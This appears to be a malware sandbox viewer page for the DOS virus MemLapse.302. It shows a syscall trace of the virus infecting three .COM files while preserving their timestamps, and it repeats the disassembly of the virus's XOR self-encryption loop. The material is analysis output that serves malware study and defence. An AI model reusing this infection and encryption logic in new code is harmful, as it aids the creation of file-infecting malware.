Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.302

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:08:25.883340291Z 26 PC: 12ab0 | Set disk transfer address
2018-12-17T23:08:25.885484461Z 78 PC: 12ab8 | Find first file
2018-12-17T23:08:25.892881424Z 47 PC: 12abe | Get disk transfer address
2018-12-17T23:08:25.894574767Z 61 PC: 12ac9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:08:25.909957731Z 87 PC: 12acf | Get or set file date and time
2018-12-17T23:08:25.911980243Z 63 PC: 12aef | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:25.918788168Z 66 PC: 12b01 | Move file pointer
2018-12-17T23:08:25.920243954Z 64 PC: 12b0c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:25.923674613Z 66 PC: 12b15 | Move file pointer
2018-12-17T23:08:25.9261895Z 44 PC: 12a74 | Get time 0x12a74: mov byte ptr [bp + 0x12c], cl
0x12a78: mov cx, 0xd1
0x12a7b: lea si, word ptr [bp + 0x15d]
0x12a7f: lea di, word ptr [bp + 0x218]
0x12a83: movsb byte ptr es:[di], byte ptr [si]
0x12a84: mov al, byte ptr [bp + 0x218]
0x12a88: xor al, byte ptr [bp + 0x12c]
0x12a8c: mov byte ptr [bp + 0x218], al
0x12a90: lea di, word ptr [si - 1]
0x12a93: lea si, word ptr [bp + 0x218]
0x12a97: movsb byte ptr es:[di], byte ptr [si]
0x12a98: mov si, di
0x12a9a: loop 0x12a7f
0x12a9c: ret
0x12a9d: lea bx, word ptr [bp + 0x22a]
0x12aa1: push word ptr [bx]
0x12aa3: add bx, 2
0x12aa6: push word ptr [bx]
0x12aa8: mov ah, 0x1a
0x12aaa: lea dx, word ptr [bp + 0x22e]
2018-12-17T23:08:25.929632822Z 64 PC: 12a5f | Write file or device (Write 302 bytes on handle 5)
2018-12-17T23:08:26.148496456Z 87 PC: 12b27 | Get or set file date and time
2018-12-17T23:08:26.153840391Z 62 PC: 12b2b | Close file
2018-12-17T23:08:26.164048618Z 79 PC: 12ab8 | Find next file
2018-12-17T23:08:26.168488443Z 47 PC: 12abe | Get disk transfer address
2018-12-17T23:08:26.170129227Z 61 PC: 12ac9 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:26.178113154Z 87 PC: 12acf | Get or set file date and time
2018-12-17T23:08:26.179891616Z 63 PC: 12aef | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:26.188167752Z 66 PC: 12b01 | Move file pointer
2018-12-17T23:08:26.19011382Z 64 PC: 12b0c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:26.194201613Z 66 PC: 12b15 | Move file pointer
2018-12-17T23:08:26.197587648Z 44 PC: 12a74 | Get time 0x12a74: mov byte ptr [bp + 0x12c], cl
0x12a78: mov cx, 0xd1
0x12a7b: lea si, word ptr [bp + 0x15d]
0x12a7f: lea di, word ptr [bp + 0x218]
0x12a83: movsb byte ptr es:[di], byte ptr [si]
0x12a84: mov al, byte ptr [bp + 0x218]
0x12a88: xor al, byte ptr [bp + 0x12c]
0x12a8c: mov byte ptr [bp + 0x218], al
0x12a90: lea di, word ptr [si - 1]
0x12a93: lea si, word ptr [bp + 0x218]
0x12a97: movsb byte ptr es:[di], byte ptr [si]
0x12a98: mov si, di
0x12a9a: loop 0x12a7f
0x12a9c: ret
0x12a9d: lea bx, word ptr [bp + 0x22a]
0x12aa1: push word ptr [bx]
0x12aa3: add bx, 2
0x12aa6: push word ptr [bx]
0x12aa8: mov ah, 0x1a
0x12aaa: lea dx, word ptr [bp + 0x22e]
2018-12-17T23:08:26.200878253Z 64 PC: 12a5f | Write file or device (Write 302 bytes on handle 5)
2018-12-17T23:08:26.20465956Z 87 PC: 12b27 | Get or set file date and time
2018-12-17T23:08:26.208036146Z 62 PC: 12b2b | Close file
2018-12-17T23:08:26.216359371Z 79 PC: 12ab8 | Find next file
2018-12-17T23:08:26.219277736Z 47 PC: 12abe | Get disk transfer address
2018-12-17T23:08:26.221484794Z 61 PC: 12ac9 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:26.228909059Z 87 PC: 12acf | Get or set file date and time
2018-12-17T23:08:26.230902065Z 63 PC: 12aef | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:26.239434462Z 66 PC: 12b01 | Move file pointer
2018-12-17T23:08:26.241342539Z 64 PC: 12b0c | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:26.244568172Z 66 PC: 12b15 | Move file pointer
2018-12-17T23:08:26.246945661Z 44 PC: 12a74 | Get time 0x12a74: mov byte ptr [bp + 0x12c], cl
0x12a78: mov cx, 0xd1
0x12a7b: lea si, word ptr [bp + 0x15d]
0x12a7f: lea di, word ptr [bp + 0x218]
0x12a83: movsb byte ptr es:[di], byte ptr [si]
0x12a84: mov al, byte ptr [bp + 0x218]
0x12a88: xor al, byte ptr [bp + 0x12c]
0x12a8c: mov byte ptr [bp + 0x218], al
0x12a90: lea di, word ptr [si - 1]
0x12a93: lea si, word ptr [bp + 0x218]
0x12a97: movsb byte ptr es:[di], byte ptr [si]
0x12a98: mov si, di
0x12a9a: loop 0x12a7f
0x12a9c: ret
0x12a9d: lea bx, word ptr [bp + 0x22a]
0x12aa1: push word ptr [bx]
0x12aa3: add bx, 2
0x12aa6: push word ptr [bx]
0x12aa8: mov ah, 0x1a
0x12aaa: lea dx, word ptr [bp + 0x22e]
2018-12-17T23:08:26.2508135Z 64 PC: 12a5f | Write file or device (Write 302 bytes on handle 5)
2018-12-17T23:08:26.254193794Z 87 PC: 12b27 | Get or set file date and time
2018-12-17T23:08:26.255977387Z 62 PC: 12b2b | Close file
2018-12-17T23:08:26.264425626Z 26 PC: 12b3f | Set disk transfer address